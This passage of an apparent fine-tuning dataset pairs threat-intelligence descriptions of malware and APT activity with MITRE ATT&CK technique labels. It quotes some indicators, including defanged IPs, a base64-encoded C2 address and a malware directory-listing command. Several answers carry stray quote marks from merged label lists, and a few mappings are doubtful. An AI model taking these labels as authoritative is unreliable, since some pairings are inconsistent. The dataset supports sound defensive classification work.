- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has the ability to create a pipe to enable inter-process communication."
- },
- {
- "role": "assistant",
- "content": "T1559 - Inter-Process Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note that .hwp is the extension used by Hangul Word Processor from Hangul Office, which is very popular in South Korea"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver encrypts this data using an incremental XOR key and uploads it to the configured remote server on the port specified. The following example Python code shows how this encryption takes place:"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanHaiShu executes additional VBScript code on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Different drivers will be loaded based on the system version. The malware uses IsWow64Process to determine which driver version to load. These drivers are stored in the resource section of the binary and are compressed with the Lempel-Ziv algorithm. The driver file is written to system32\\drivers with a 4-character, pseudo-randomly generated name. This file is then decompressed using LZCopy to a new file with a “.sys” extension"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal's dropper creates VBS scripts on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can modify the `HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\` registry key so it can bypass the VB object model (VBOM) on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Last March, we reported a WildPressure campaign targeting industrial-related entities in the Middle East. While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has searched public code repositories for exposed credentials."
- },
- {
- "role": "assistant",
- "content": "T1593.003 - Code Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IronNetInjector has been disguised as a legitimate service using the name PythonUpdateSrvc."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload is embedded in the macro as Base64 code. It uses the certutil program to decode the Base64 into a PE file which is then executed"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARDUMP's scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses DNS as its C2 protocol."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CaddyWiper can use `DsRoleGetPrimaryDomainInformation` to determine the role of the infected machine. CaddyWiper can also halt execution if the compromised host is identified as a domain controller."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In both Carbanak and FIN7 attacks, communication with users’ compromised systems is done through bypassing firewalls or network detection systems via commonly used ports, using connection proxies to avoid direct connections to the threat group’s infrastructure, employing the command-and-control channel to remotely copy files from an external system, blending in with existing network traffic by using standard application layer protocol, and taking advantage of standard cryptographic protocol to disguise command-and-control traffic."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enable remote desktop on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT has collected data and files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "XAgentOSX contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory. XAgentOSX contains the showBackupIosFolder function to check for IOS device backups by running \"ls -la ~/Library/Application\\ Support/MobileSync/Backup/\"."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA."
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moses Staff has used batch scripts that can disable the Windows firewall on specific remote machines."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Successfully checking the loader will execute the dllhost.exe process and create a hardcode mutex to avoid injecting it into the wrong dllhost.exe, as there can be multiple instances of it depending on the number of programs using the Internet Information Services"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT34 has used the command-line interface for execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has the ability to exfiltrate data over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh keys and known hosts if they are available to infect other machines"
- },
- {
- "role": "assistant",
- "content": "T1552.004 - Unsecured Credentials: Private Keys"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including \"RegEnumKeyW\"."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch can exfiltrate files from compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When running with root privileges after a Launch Agent is installed, ThiefQuest installs a plist file to the \"/Library/LaunchDaemons/\" folder with the \"RunAtLoad\" key set to \"true\" establishing persistence as a Launch Daemon."
- },
- {
- "role": "assistant",
- "content": "T1543.004 - Create or Modify System Process: Launch Daemon"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads a new version of itself once it has installed. It also downloads additional plugins."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Initial QAKBOT .zip file bypasses some antivirus detections due to password protections."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RTM can obtain information about security software on the victim."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products. After a few months, Turla has improved these scripts and is now using them to load a wide range of custom malware from its traditional arsenal. PowerShell Loader . The PowerShell loader has three main steps: persistence, decryption and loading into memory of the embedded executable or library. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload. WMI consumer PowerShell command . Finally, the script stores the encrypted payload in the Windows registry. Hijacked profile.ps1 file . The base64-encoded PowerShell command is very similar to the one used in the WMI consumers. The key and the salt are also different for each script and are not stored in the script, but only in the WMI filter or in the profile.ps1 file. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools. Finally, the usage of open-source tools does not mean Turla has stopped using its custom tools"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare has used a variety of Windows API functions."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory', 'T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROADTools leverages valid cloud credentials to perform enumeration operations using the internal Azure AD Graph API."
- },
- {
- "role": "assistant",
- "content": "T1078.004 - Valid Accounts: Cloud Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has used Rundll32 to load a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The group appears to maintain a stockpile of stolen certificates and deploys their downloaders and the backdoors signed with them. Some of the more recent revoked certificates include ones that belong to Xuchang Hongguang Technology Co"
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldenSpy has used the Ryeol HTTP Client to facilitate HTTP internet communication."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication that other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key “78563412”. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. Adding to the change in encryption type, a large part of the code such as network communication procedures, and the persistence method have been re-written. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used DNS for C2 including the publicly available \"requestbin.net\" tunneling service."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial beacon packet for Misdat contains the operating system version of the victim."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can capture the victim's screen."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZIRCONIUM has used a tool to query the Registry for proxy settings."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "See the following for more information and examples of false flags being used in cyberattacks: Wave your false flags! …or the Nightmares and Nuances of a Self-Aware Attribution Space OlympicDestroyer is here to trick the industry Malware description The malware was first seen packed with VMProtect; when unpacked the sample didn’t show any similarities with previously known malware"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox has gained execution through user interaction with a malicious file."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "itwm= ags= oe= aq= btnG= oprnd= itwm= utm= channel= The XAgent OSX Trojan generates a system specific value that it refers to as an “agent_id”, which is a unique identifier for each compromised host"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware uses xor key [0x09, 0xff, 0x20] to decrypt content in .data section and get string “aHR0cDovLzUxLjE1LjE5Ni4zMC8xL2luZGV4LnBocA”. Then malware does base64 decoding to get the C2 address"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can send stolen information to C2 nodes including passwords, accounts, and emails."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An older variant of performs UAC bypass."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a tool known as RemoteExec (similar to ) to remotely execute batch scripts and binaries."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the access vectors most used by ACTINIUM is spear-phishing emails with malicious macro attachments that employ remote templates. Remote template injection refers to the method of causing a document to load a remote document template that contains the malicious code, in this case, macros"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1027 - Obfuscated Files or Information', 'T1204.002 - User Execution: Malicious File', 'T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seth-Locker can execute commands via the command line shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81."
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore can perform keylogging on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exploitation of this vulnerability allows an attacker to escalate privileges on the affected system"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group malware IndiaIndia obtains and sends to its C2 server the title of the window for each running process. The KilaAlfa keylogger also reports the title of the window in the foreground."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors' proxy implementation \"Agent\" upgraded the socket in use to a TLS socket."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke is capable of executing commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses ZPP, a .NET console program, to compress files with ZIP."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to retrieve information about the OS."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to escalate privileges by bypassing User Access Control."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang used a SharePoint enumeration and data dumping tool known as spwebmember."
- },
- {
- "role": "assistant",
- "content": "T1213.002 - Sharepoint"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell has used rundll32.exe to execute other DLLs and named pipes."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy."
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Despite this indictment and other disclosures of COBALT DICKENS campaigns, the threat group (also known as Silent Librarian) shows no signs of stopping its activity as of this publication. CTU™ researchers have observed the threat actors using free online services as part of their operations, including free certificates, domains, and publicly available tools"
- },
- {
- "role": "assistant",
- "content": "T1608.005 - Link Target"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
